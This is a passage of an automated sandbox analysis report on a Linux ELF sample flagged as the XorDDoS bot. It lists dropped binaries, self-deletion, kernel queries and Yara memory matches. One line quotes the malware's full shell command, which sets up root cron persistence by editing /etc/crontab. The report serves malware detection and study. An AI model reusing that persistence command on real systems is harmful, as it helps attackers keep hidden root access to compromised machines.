Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Reads from proc file: /proc/cpuinfo	Jump to behavior

Source: /sbin/update-rc.d (PID: 6219)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/dptxrnhxmx.elf (PID: 6214)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /tmp/dptxrnhxmx.elf (PID: 6209)

Writes shell script file to disk with an unusual file extension: /etc/init.d/dptxrnhxmx.elf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/init.d/dptxrnhxmx.elf	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/qabtuykfdb	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/wrvptdarnp	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/mbeioyodii	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/wobaryykiz	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/rhlqbltizb	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/gcfolkfaec	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/scllcnzpeu	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/tgdthymawi	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/drdxrfohux	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/doxgrgkpoa	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/mntlutgnfs	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/zfzhrlhjxr	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/tqdlzqtrvv	Jump to dropped file

Sample deletes itself

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/nffvpfovhi	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /usr/bin/zvrtnapfcs	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6245)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6250)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6253)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6256)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6257)	File: /usr/bin/qabtuykfdb	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6300)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6303)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6306)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6311)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6312)	File: /usr/bin/wrvptdarnp	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6318)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6321)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6324)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6329)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6332)	File: /usr/bin/mbeioyodii	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6339)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6342)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6345)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6350)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6351)	File: /usr/bin/wobaryykiz	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6356)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6361)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6364)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6367)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6368)	File: /usr/bin/rhlqbltizb	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6373)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6376)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6379)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6382)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6385)	File: /usr/bin/gcfolkfaec	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6390)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6393)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6396)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6399)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6402)	File: /usr/bin/scllcnzpeu	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6408)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6411)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6416)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6420)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6422)	File: /usr/bin/tgdthymawi	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6429)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6433)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6437)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6438)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6439)	File: /usr/bin/drdxrfohux	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6447)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6451)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6453)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6455)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6456)	File: /usr/bin/doxgrgkpoa	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6463)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6467)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6471)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6472)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6473)	File: /usr/bin/mntlutgnfs	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6481)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6486)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6489)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6490)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6491)	File: /usr/bin/zfzhrlhjxr	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6498)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6502)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6504)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6507)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6508)	File: /usr/bin/tqdlzqtrvv	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6518)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6521)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6524)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6527)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6528)	File: /usr/bin/vigcpbezza	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6535)	File: /usr/bin/nffvpfovhi	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6539)	File: /usr/bin/nffvpfovhi	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6542)	File: /usr/bin/nffvpfovhi	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6544)	File: /usr/bin/nffvpfovhi	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6545)	File: /usr/bin/nffvpfovhi	Jump to behavior

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/dptxrnhxmx.elf (PID: 6208)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6244)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6247)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6249)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6252)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qabtuykfdb (PID: 6255)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6299)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6302)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6305)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6308)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvptdarnp (PID: 6310)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6317)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6320)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6323)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6326)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mbeioyodii (PID: 6328)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6338)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6341)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6344)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6347)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wobaryykiz (PID: 6349)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6355)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6358)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6360)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6363)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rhlqbltizb (PID: 6366)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6372)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6375)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6378)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6381)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gcfolkfaec (PID: 6384)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6389)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6392)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6395)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6398)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/scllcnzpeu (PID: 6401)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6407)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6410)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6415)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6418)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tgdthymawi (PID: 6421)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6426)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6428)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6431)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6434)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/drdxrfohux (PID: 6436)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6443)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6445)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6448)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6450)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/doxgrgkpoa (PID: 6454)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6460)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6462)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6465)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6468)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mntlutgnfs (PID: 6470)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6478)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6480)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6483)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6485)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfzhrlhjxr (PID: 6488)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6495)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6497)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6500)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6503)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/tqdlzqtrvv (PID: 6506)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6515)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6517)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6520)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6523)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vigcpbezza (PID: 6526)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6532)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6534)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6537)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6540)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nffvpfovhi (PID: 6543)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zvrtnapfcs (PID: 6549)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zvrtnapfcs (PID: 6551)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zvrtnapfcs (PID: 6554)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zvrtnapfcs (PID: 6556)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zvrtnapfcs (PID: 6560)	Queries kernel information via 'uname':	Jump to behavior

Source: /tmp/dptxrnhxmx.elf (PID: 6209)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: dptxrnhxmx.elf, type: SAMPLE
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6210, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6211, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6243, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6251, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6254, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6307, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6309, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6319, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6343, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6346, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6357, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6362, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6365, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6371, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6374, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6377, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6383, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6394, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6397, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6409, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6414, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6417, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/qabtuykfdb, type: DROPPED
Source: Yara match	File source: /usr/bin/tqdlzqtrvv, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/rhlqbltizb, type: DROPPED
Source: Yara match	File source: /usr/bin/wrvptdarnp, type: DROPPED
Source: Yara match	File source: /usr/bin/mntlutgnfs, type: DROPPED
Source: Yara match	File source: /usr/bin/scllcnzpeu, type: DROPPED
Source: Yara match	File source: /usr/bin/wobaryykiz, type: DROPPED
Source: Yara match	File source: /usr/bin/zfzhrlhjxr, type: DROPPED
Source: Yara match	File source: /usr/bin/tgdthymawi, type: DROPPED
Source: Yara match	File source: /usr/bin/gcfolkfaec, type: DROPPED
